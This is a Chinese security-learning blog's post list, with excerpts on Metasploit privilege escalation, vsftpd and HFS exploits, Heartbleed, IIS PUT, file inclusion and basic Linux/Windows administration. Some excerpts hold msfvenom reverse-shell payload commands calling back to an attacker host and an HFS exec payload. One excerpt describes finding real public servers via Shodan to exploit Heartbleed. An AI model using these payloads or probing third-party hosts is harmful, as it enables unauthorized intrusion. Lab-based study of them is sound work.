- 博客(20)
- 收藏
- 关注
RSS订阅原创 msf下Windows提权
利用msf生成payload获取目标机session利用msf生成payload(可以获得一个低权限的session)生成linux木马msfvenom -a x64 --platform linux -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.42.49 LPORT=5555 -i 3 -f elf -o testmsfvenom -a x86 --platform linux -p linux/x64/meterpreter/..
2021-03-18 11:27:26
271
1
原创 vsftpd2.3.4 后门利用脚本编写
安全开发-Vsftpd2.3.4后门利用脚本编写来自法老的博客Python专题Created At :2021-01-29 16:59Views ???? :15一:漏洞起源二:手动利用靶场环境定位 环境 IP Address 攻击机 Python3.8 192.168.31.33 靶机 Metasploitable2 192.168.31.20 步骤一:FTP登录使用用户名+:)来进行用户登录,密码随便填写,连接
2021-01-31 11:18:46
1198
原创 安全开发-PHPMyadmin任意文件读取脚本编写
https://laosec.cn/2021/01/27/%E5%AE%89%E5%85%A8%E5%BC%80%E5%8F%91-PHPMyadmin%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E8%84%9A%E6%9C%AC%E7%BC%96%E5%86%99/
2021-01-31 11:15:15
224
原创 渗透测试工程师可以写进简历的技能介绍部分
1. 了解计算机基本知识,熟悉 Windows、Linux操作系统,具备Windows运维 相关知识, 有过搭建“DNS、FTP、DHCP”等服务器 经验;2.熟悉tcp/ip协议,熟悉sql注入原理和手工检测,能熟练使用“sqlmap、burpsuit、nmap、msf”等渗透必备工具;3.熟悉php,shell,python 等编程语言,熟练掌握 print,input,output等高频函数用法, 能够编写简单的python脚本;4 . 熟练掌握“文件包含、文件上传、ssrf、csrf、x
2021-01-31 10:58:36
5994
1
转载 php反序列化漏洞
PHP反序列化漏洞复现测试代码我们运行以上代码文件,来证明函数被调用:应为没有创建对象,所以构造函数__construct()不会被调用,但是__wakeup()跟__destruct()函数都被调用,如果这些函数里面包含的是恶意代码会怎么样呢?利用场景__wakeup() 或__destruct()由前可以看到,unserialize()后会导致__wakeup() 或__destruct()的直接调用,中间无需其他过程。因此最理想的情况就是一些漏洞/...
2021-01-31 10:20:22
184
转载 iis6.0 put漏洞
iis6.0-put漏洞上传复现首先准备window server 2003r2 +iis6.0然后搭建一个网站(需要启用webDAR)一、搭建网站初始页面选择存放路径权限给的大一点添加一个可以解析的asp文档网站添加一个erverone权限二、漏洞扫描()http://192.168.0.178:80|Microsoft-IIS/6.0|http://192.168.0.178/20213705113750.txt|webdva漏洞 来源模式一咱们到靶机中查看发现网站根目录下一个文件
2021-01-31 10:16:56
340
转载 心脏滴血漏洞
心脏滴血漏洞复现首先用shadan进行搜索主机搜索格式为openssl 1.0.1a然后随便找一个请求为200的主机进行漏扫一、使用专门的工具进行扫描219.117.252.132发现这个主机没有可以利用的我们需要再换一个149.202.69.214发现可以有一个可以利用的二、使用nmap工具进行扫描nmap -sV -p 443 149.202.69.214 --script=ssl-heartbleed.nse 1发现下面给爆出了漏洞编号漏洞发现完成之后,我们就该利用了
2021-01-31 10:14:51
675
原创 python学习笔记
部分资料转载自:https://www.cnblogs.com/wxcx/p/8068218.html1.python简介(百度上都是) python是一种面向对象的,解释型的计算机语言,它的特点是语法简介,优雅,简单易学。 编译型语言:代码在编译之后,编译成2进制的文件,然后计算机就可用运行了。(C,C++,C#) 解释型语言:它是在运行的时候才编译的。(python,php,shell,ruby,js,java) 脚本语言:指这个语言只有一个单一的功能。(shell,js)
2021-01-31 10:12:48
133
原创 流量映射端口反弹(lcx,ew)
转载自西梅哥的有道云:https://note.youdao.com/ynoteshare1/index.html?id=a6bf797cce0b6087cb78b44818dca69f&type=note内网应用一、端口转发工具:1.LCX(支持双系统)A、window(LCX)上传一些内网主机探测的工具ms17010(适合08,07)1.首先安装lcx(正向连接)在内网主机:转发:lcx.exe–slave公网主机ip公网主机端口内网主机ip内网...
2021-01-31 09:31:58
767
转载 python---hfs poc
环境准备window server 2012 (被攻击的机器)ip 192.168.0.x存在hfs服务win 10 (攻击机器)ip 192.168.0.y攻击者环境:Python3 requests库环境部署window server 2012 上面需要进行安装hfs部署好之后,我们在物理机上进行访问的时候,他会有请求的信息攻击机上访问发现成功访问漏洞利用:添加用户:exp/?search==%00%7B.exec%...
2021-01-31 09:28:56
313
转载 文件包含漏洞
什么是文件包含?在文件包含里面,我们要想方设法把真正包含的文件掉包,换成恶意文件,服务器却不知道。文件包含:是一种代码处理方式,当一个代码文件想要引用另外一个代码文件,就要用到包含,常见的包含函数有include、require等,参数是文件名。但是如果文件包含的参数用户可控且过滤不严,被攻击者偷梁换柱。LOW等级:首先进行正常的操作:点击fil1和file2时,仅仅是配置参数的变化,而其他并没有变化,这个参数便是可以利用的。首先进行尝试,将这个参数随便改成test.php,显示
2020-12-22 20:10:38
80
转载 hackme1
HACKME:1靶机地址 https://www.vulnhub.com/entry/hackme-1,330/靶机IP:192.168.3.142kaliIP:192.168.3.133主机发现root@kali:~# arp-scan -l端口扫描开放了80、22端口目录扫描root@kali:~/dirsearch# python3 dirsearch.py -u http://192.168.3.142/ -e *依次访问试试http://192.168.3.142/log
2020-12-21 20:05:53
192
原创 linux一些基本命令
1.开启关闭防火墙端口2.开启重启关闭防火墙3.用户和组管理创建用户创建组把用户添加到该组里Uersmod -G 组名 用户名
2020-12-05 16:16:24
91
原创 2020-12-05
Linux基本命令ls 是英文单词 list 的简写,类似于 DOS 下的 dir 命令。通过 ls 命令不仅可以查看 Liunx 文件夹包含的文件,而且可以查看文件权限(包括目录、文件夹、文件权限)、查看目录等等2.cd cd 是英文单词 change directory 的简写,其功能为更改当前的工作目录,参数可以为相对路径或绝对路径,如不跟任何参数,则切换到用户主目录,cd 为最常用的命令,与 DOS 的 cd 命令类似。注意:Linux 所有的 目录 和 文件名 都是大小...
2020-12-05 16:15:49
121
原创 2020-12-05简单测试
1:创建Centos 7虚拟主机,并命名为”Centos-all”,其配置要求如: 主机名 内存 网络连接模式 IP地址设置 VNC连接端口 Host1 4G Vmnet0 静态IP地址 65535 2:在Centos-A1虚拟主机中创建本地YUM源:”Centos-姓名”并查看YUM源...
2020-12-05 16:14:54
163
原创 FTP服务器搭建
FTP服务器搭建添加角色web服务器IISà勾选FTP服务器à安装打开IIS,右键网站属性à添加FTP站点à分配ipà勾选身份验证并授权3.本地创建组并加入用户即可访问ftp服务器11
2020-11-21 12:38:13
135
原创 用户管理和组
用户管理和组一、用户管理和组1.用户管理SID安全标识符 Windows管理员uid通常为500,普通用户从1000起;Linux管理员uid通常为0Windows系统用户信息通常路径为C:\windows\system32\config\SAM hash不可逆算法服务器默认密码最长有效期42天2.内置账户给人使用的账户administrator管理员账户 guest来宾账户计算机服务组件相关的系统账号system 权限至高无上 local service本地服务账户 network s
2020-11-21 12:36:47
74
原创 DNS服务器搭建
DNS服务器搭建准备:手动配置网络ip地址点击开始à服务器管理器à添加角色DNS打开DNSà正向查找à新建区域点击madongmei.comà新建主机à输入ip地址à添加主机反向查找à新建区域à输入网络idà配置新建指针打开IIS managerà更改绑定à编辑ip7.然后就完成了。...
2020-11-16 18:04:56
82
原创 一些计算机基础知识
马冬梅学习笔记一、1.计算机的组成–硬件+软件硬件–主机、外设主机:中央处理器(运算器、控制器)、内储存器(ROM,RAM)外设:输出设备(显示器、音箱、打印机)、输入设备(键盘鼠标摄像头)、外储存器(软盘硬盘u盘)软件–系统软件、应用软件系统软件:操作系统、驱动程序、语言处理程序、数据库管理系统应用软件:文本编辑器、视频播放器、浏览器2.常见计算机服务WWW服务–web服务DHCP服务–路由分发TELNET服务–远程连接(命令行)SMTP服务 --简单邮件传输协议POP3服务–
2020-11-12 21:14:57
248
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人